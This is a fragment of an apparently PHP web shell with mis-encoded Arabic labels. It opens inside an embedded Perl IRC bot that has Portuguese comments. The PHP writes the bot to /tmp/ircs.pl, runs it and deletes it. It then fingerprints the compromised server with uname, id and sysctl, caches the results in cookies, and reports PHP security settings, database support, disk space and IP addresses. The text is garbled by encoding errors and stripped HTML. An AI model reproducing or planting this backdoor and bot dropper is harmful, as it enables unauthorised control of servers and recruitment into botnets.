\$DCC{\$dccsock}{curbyte} = 0; \$DCC{\$dccsock}{arquivo} = \$arquivo; \$DCC{\$dccsock}{ip} = \$dccip; \$DCC{\$dccsock}{porta} = \$dccporta; \$DCC{\$dccsock}{status} = \"Recebendo\"; } ############################ # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas sub Status { my \$socket = shift; my \$sock_tipo = \$DCC{\$socket}{tipo}; unless (lc(\$sock_tipo) eq \"chat\") { my \$nick = \$DCC{\$socket}{nick}; my \$arquivo = \$DCC{\$socket}{arquivo}; my \$itime = \$DCC{\$socket}{itime}; my \$ftime = time; my \$status = \$DCC{\$socket}{status}; \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); my \$d_time = \$ftime-\$itime; my \$cur_byte = \$DCC{\$socket}{curbyte}; my \$bytes_total = \$DCC{\$socket}{bytes}; my \$rate = 0; \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; my \$porcen = (\$cur_byte*100)/\$bytes_total; my (\$r_duv, \$p_duv); if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { \$r_duv = $3; \$r_duv++ if $4 >= 5; \$rate = \"$1\.$2\".\"\$r_duv\"; } if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { \$p_duv = $3; \$p_duv++ if $4 >= 5; \$porcen = \"$1\.$2\".\"\$p_duv\"; } return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); } return(0); } # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) sub fixaddr { my (\$address) = @_; chomp \$address; # just in case, sigh. if (\$address =~ /^\d+$/) { return inet_ntoa(pack \"N\", \$address); } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { return \$address; } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! 
return inet_ntoa(((gethostbyname(\$address))[4])[0]); } else { return; } } ############################ "; $bot = "/tmp/ircs.pl"; $open = fopen($bot,"w"); fputs($open,$file); fclose($open); $cmd="perl $bot"; $cmd2="rm $bot"; system($cmd); system($cmd2); $_POST['cmd']="echo \"Now script try connect to ircserver ...\""; } if($unix) { if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } if($safe_mode) { $sysctl = '-'; } else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } if(empty($sysctl)) { $sysctl = '-'; } setcookie('sysctl',$sysctl); } } echo $head; echo ''; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print ""; @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}} echo '"; echo ws(2)."ÇáæÖÚ ÇáÇãä: "; echo (($safe_mode)?("ÝÚÇá"):("ÛíÑ ÝÚÇá")); echo "".ws(2); echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: ".@phpversion().""; $curl_on = @function_exists('curl_version'); echo ws(2); echo "ÇáßíÑá: ".(($curl_on)?("ÝÚÇá"):("ÛíÑ ÝÚÇá")); echo "".ws(2); echo "ãÇí Óßá: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo "Çã ÇÓ Óßá: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ÝÚÇá";}else{echo "ÛíÑ ÝÚÇá";} echo "".ws(2); echo "ÈæÓÊ ÞÑí Óßá: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ÝÚÇá";}else{echo "ÛíÑ ÝÚÇá";} echo "".ws(2); echo "ÇæÑÇßá: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ÝÚÇá";}else{echo "ãÛáÞ";} echo "
".ws(2); echo "ÇáÏæÇá ÇáããäæÚÉ : "; if(''==($df=@ini_get('disable_functions'))){echo "áÇíæÌÏ";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} echo "
".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : ".view_size($free)." ÇáãÓÇÍÉ ÇáßáíÉ: ".view_size($all).""; echo "
".ws(2); echo "Register globals: "; $reg_g = @ini_get("register_globals"); if($reg_g){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo "open_basedir: "; $openbasedi = @ini_get("open_basedir"); if($openbasedi){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo '
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
ip :'.ws(1).'
'; echo "
"):(ws(3).@substr(@php_uname(),0,120)."
")); echo ws(3).$sysctl."
"; echo ws(3).ex('echo $OSTYPE')."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; if(!empty($id)) { echo ws(3).$id."
"; } else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
'; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"; echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo "
"; echo ws(3)."Your ip: ".$_SERVER["REMOTE_ADDR"]." - Server ip: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo ""; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
ip :'.ws(1).'
'; echo "
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@getenv("USERNAME")."
"; echo ws(3).$dir; echo "
"; echo ws(3)."Your ip: ".$_SERVER["REMOTE_ADDR"]." - Server ip: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo "
"; } echo ""; echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo "
".in('submit','submit',0,$lang[$language.'_butt1'])."